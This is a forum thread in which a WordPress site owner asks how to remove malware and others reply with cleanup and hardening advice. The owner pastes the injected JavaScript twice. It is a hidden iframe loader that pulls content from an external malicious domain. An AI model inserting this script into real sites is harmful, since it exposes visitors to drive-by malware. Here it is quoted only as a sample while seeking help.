Major help!!!!

NUGFX

Member
my website has been attacked and hit with malware, is there anyway you can remove this without a fresh install of my site?

please let there be a way, been looking at everything. i know what the malware is but i cant remove it.

<script type="text/javascript" language="javascript" > var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://srlqpdbd.pro/in.cgi?2');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f);</script>
 
my website has been attacked and hit with malware, is there anyway you can remove this without a fresh install of my site?

please let there be a way, been looking at everything. i know what the malware is but i cant remove it.

<script type="text/javascript" language="javascript" > var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://srlqpdbd.pro/in.cgi?2');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f);</script>

Where is it? If it's in one of the wordpress files you can easily just reupload that file? If it's in a plugin file disable that plugin
 
I have heard from a friendly 'geek' that is can be one of the problems with Wordpress... WP is hackable! Sorry... what about your hosting co?
 
Hi Nugfx, theres a really easy fix to your problem in the short term, jusr re-upload your local copy from your own computer (obviously check that copy for the virus first ) this will override the hosted version on the server and remove the offending virus. In the long run though i would heed Katedesign, Wordpress may seem freindly and easy to use but it's securty is terrible, espicialy if you use templates and plugins. It might seem like a pain in the behind to use something else but it will stop issues like this in the future. also check with your hosting company as they should have an anti visur system that would pick this one up, i would change them asap. Best of luck.

Matt.
 
One of the main issues with Wordpress (and other CMS) is that people don't usually carry out even the basic security stuff. I see references to wp-content folders in source code all the time and that makes it easily figerprinted. Before long you're on the speed-dial of every hacker-bot out there.

Hmmm there are some familiar looking 'wp' links... I wonder what happens if I type in www.linktosite.co.uk/wp-admin?.. Oh look, there is a lovely WP login screen... Let the brute force attack begin! Not dealing with that sort of thing is just asking to get hacked. I know securing a site is a ball ache and makes updating that much harder but it just has to be done.
 
thx alot 4 ur responses, unfortunately i cudnt remove the script and in the end had to restart my site, im well guttered :(

ill look at bulletproof spotty. but now i just gotta wait 4 google to rescan and verify my site :(
 
One of the *major* offenders is a permissions setting of 777 which opens up your folders to anyone else on the same server. I'd double check your permissions on directories and which users/user groups have access.
 
all my permissions were set right and i was the only admin able 2 use ftp on my server. anyway ive secured my site upto the eyeballs now haha now is the process of re writing all my content again :(
 
One of the wordpress sites I made for a mate had a similar attack. It was called an iframe injection attach where basically every single php file on the server was edited to contain an iframe to a nasty website. I think this was down to the ftp password being compromised - so it was just a case of uploading the local non-infected site and changing the passwords.

Wordpress does have all kinds of security options and plugins. You just need to be careful out there!

Shame you couldn't salvage your website and not have to start again...
 
Back
Top